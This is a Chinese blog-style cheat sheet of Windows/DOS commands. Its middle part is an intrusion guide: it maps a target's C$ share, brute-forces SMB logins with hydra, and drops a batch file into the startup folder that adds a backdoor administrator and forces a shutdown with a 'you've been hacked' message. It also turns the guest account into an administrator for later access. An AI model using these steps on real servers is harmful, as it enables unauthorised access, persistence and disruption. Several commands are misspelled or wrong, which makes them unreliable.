DOS部分命令

来源：互联网发布：证件照合成软件编辑：程序博客网时间：2024/05/22 02:16

shutdown -s -t 180 -c "你呗黑了" 180秒后关机（把-s换位-r为重启）

cls 清屏

dir 查看目录

cd 进入目录

md f:\wh 创建在f盘名为wh的文件夹

rd f:\wh 删除在f盘名为wh的文件夹

====================

copy con A.txt 创建A.txt文本文件;
sada　　　　　输入内容;
　　　按CTRL+Z键，之后再回车；

========================

type seven.txt 在终端查看文件seven.txt内容

start seven.txt 打开文件seven查看内容

del seven.txt 删除seven.txt文件

======================================

tree 以树状形式查看目录

=====================

copy ww.txt c:\wh 把ww.txt文件复制到c:\wh文件夹下

move ww.txt c:\wh 把ww.txt文件移动到c:\wh文件夹下

===============================共享文件夹和盘符的利用=================

net share 查看开启共享的盘符或文件夹

利用开启共享的盘符C

net use k: \\192.168.168.131\c$ 把ip地址为192.168.168.131的电脑的c盘（c$便是指c盘符，必须开启了共享才行）当做我本地机的k盘，执行此命令要输入目标机用户名和密码（如果原来已经输入则不用在输入）

利用开启的共享文件夹<建站程序>

运行\\目标ip 就可查看目标共享的文件夹

\\192.168.168.131

爆破smb协密码

运用hydra工具进行smb协议的爆破（此工具还有很多协议的爆破用法）

在此工具目录下写入字典

dos进入此工具的路劲

----------------------------------------共享文件夹利用手段------------------------------

通过上面知识获取到管理员用户密码和共享的文件夹，此时你可以写一个批处理文件（批处理文件指把里面的内容的命令用dos命令一一执行），此文件里写入创建用户的命令和重启的命令，把此文件利用共享盘符的功能把它放在桌面和启动项里就ok

当管理员点击此文件服务器自动重启并创建用户并且关机，或者，当管理员重启服务器时自动创建用户

批处理文件代码可为：

net user web 123456 \add

net user administrators web \add

shutdown -s -t 180 -c "你被黑了"

===================================

net start 查看开启的服务

net start 某服务开启某服务

net stop 某服务关闭某服务

==============================

net user 查看用户

net user web 123 /add 创建密码为123的web用户

net user administrtors web /add 把web用户加到超级管理员组

net password 456 更改系统密码为456

net user administrtor 123 把 administrtor用户密码改为123

=====

net user guest /active:yes 激活guest用户

net user guest 1234 将Guest的密码改为1234,或者你要设定的密码

net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

==============================

netstat -an 查看端口开放情况

netstat -v 查看正在进行的工作

======================================

at 18:00 whoami 在指定时间时执行指定命令，此处为在18:00执行whoami的命令

at 查看计划任务

==========================================

attrib 查看目录属性

0 0